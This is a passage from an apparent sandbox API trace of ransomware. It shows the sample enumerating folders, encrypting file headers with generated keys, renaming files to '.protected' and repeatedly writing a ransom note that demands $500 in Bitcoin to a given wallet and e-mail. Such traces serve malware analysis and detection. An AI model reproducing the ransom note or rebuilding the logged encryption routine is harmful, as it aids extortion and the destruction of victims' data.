SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.444] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0066.445] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.445] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0066.445] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.445] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0066.445] CloseHandle (hObject=0xd4) returned 1 [0066.446] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.446] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.446] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\RESTORE_FILES.txt") returned 65 [0066.446] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.446] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.446] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.447] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.447] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.447] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.447] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.447] CloseHandle (hObject=0xb4) returned 1 [0066.448] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.448] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.448] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\RESTORE_FILES.txt") returned 59 [0066.448] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.448] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.448] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.449] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.449] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.449] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.449] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.449] CloseHandle (hObject=0xa4) returned 1 [0066.449] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.449] lstrcmpiW (lpString1="IdentityCRL", lpString2="Windows") returned -1 [0066.449] lstrcmpiW (lpString1="IdentityCRL", lpString2="Program Files") returned -1 [0066.449] lstrcmpiW (lpString1="IdentityCRL", lpString2="Program Files (x86)") returned -1 [0066.449] lstrcmpiW (lpString1="IdentityCRL", lpString2="$Recycle.bin") returned 1 [0066.449] lstrcmpiW (lpString1="IdentityCRL", lpString2="System Volume Information") returned -1 [0066.449] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL") returned 40 [0066.449] lstrcmpW (lpString1="IdentityCRL", lpString2=".") returned 1 [0066.449] lstrcmpW (lpString1="IdentityCRL", lpString2="..") returned 1 [0066.450] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*") returned 42 [0066.450] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.450] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.450] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.450] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.450] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.450] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.450] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\.") returned 42 [0066.450] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.450] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.450] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.450] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.450] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.450] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.450] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.450] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\..") returned 43 [0066.450] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.450] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.450] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.450] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="Windows") returned -1 [0066.450] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="Program Files") returned -1 [0066.450] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="Program Files (x86)") returned -1 [0066.450] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="$Recycle.bin") returned 1 [0066.450] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="System Volume Information") returned -1 [0066.451] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned 56 [0066.451] StrStrIW (lpFirst="ppcrlconfig.dll", lpSrch=".protected") returned 0x0 [0066.451] lstrcmpW (lpString1="ppcrlconfig.dll", lpString2="RESTORE_FILES.txt") returned -1 [0066.451] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.451] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.451] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.451] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned 56 [0066.451] StrStrW (lpFirst="ppcrlconfig.dll", lpSrch=".txt") returned 0x0 [0066.451] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned 56 [0066.451] StrStrW (lpFirst="ppcrlconfig.dll", lpSrch=".rar") returned 0x0 [0066.451] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned 56 [0066.451] StrStrW (lpFirst="ppcrlconfig.dll", lpSrch=".zip") returned 0x0 [0066.451] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.475] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.475] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.476] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.476] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.486] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.494] CloseHandle (hObject=0xb4) returned 1 [0066.502] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.protected") returned 66 [0066.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.protected" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll.protected")) returned 1 [0066.503] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.503] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="Windows") returned -1 [0066.503] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="Program Files") returned -1 [0066.503] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="Program Files (x86)") returned -1 [0066.503] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="$Recycle.bin") returned 1 [0066.503] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="System Volume Information") returned -1 [0066.503] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned 52 [0066.503] StrStrIW (lpFirst="ppcrlui.dll", lpSrch=".protected") returned 0x0 [0066.503] lstrcmpW (lpString1="ppcrlui.dll", lpString2="RESTORE_FILES.txt") returned -1 [0066.503] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.503] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.503] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.509] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned 52 [0066.509] StrStrW (lpFirst="ppcrlui.dll", lpSrch=".txt") returned 0x0 [0066.509] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned 52 [0066.509] StrStrW (lpFirst="ppcrlui.dll", lpSrch=".rar") returned 0x0 [0066.509] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned 52 [0066.509] StrStrW (lpFirst="ppcrlui.dll", lpSrch=".zip") returned 0x0 [0066.509] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.530] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.530] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.531] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.531] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.531] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.531] CloseHandle (hObject=0xb4) returned 1 [0066.537] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.protected") returned 62 [0066.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.protected" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll.protected")) returned 1 [0066.538] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.538] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.538] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\RESTORE_FILES.txt") returned 58 [0066.538] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\identitycrl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.566] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.566] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.567] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.567] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.567] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.568] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.568] CloseHandle (hObject=0xa4) returned 1 [0066.568] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.568] lstrcmpiW (lpString1="Media Player", lpString2="Windows") returned -1 [0066.568] lstrcmpiW (lpString1="Media Player", lpString2="Program Files") returned -1 [0066.568] lstrcmpiW (lpString1="Media Player", lpString2="Program Files (x86)") returned -1 [0066.568] lstrcmpiW (lpString1="Media Player", lpString2="$Recycle.bin") returned 1 [0066.568] lstrcmpiW (lpString1="Media Player", lpString2="System Volume Information") returned -1 [0066.568] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player") returned 41 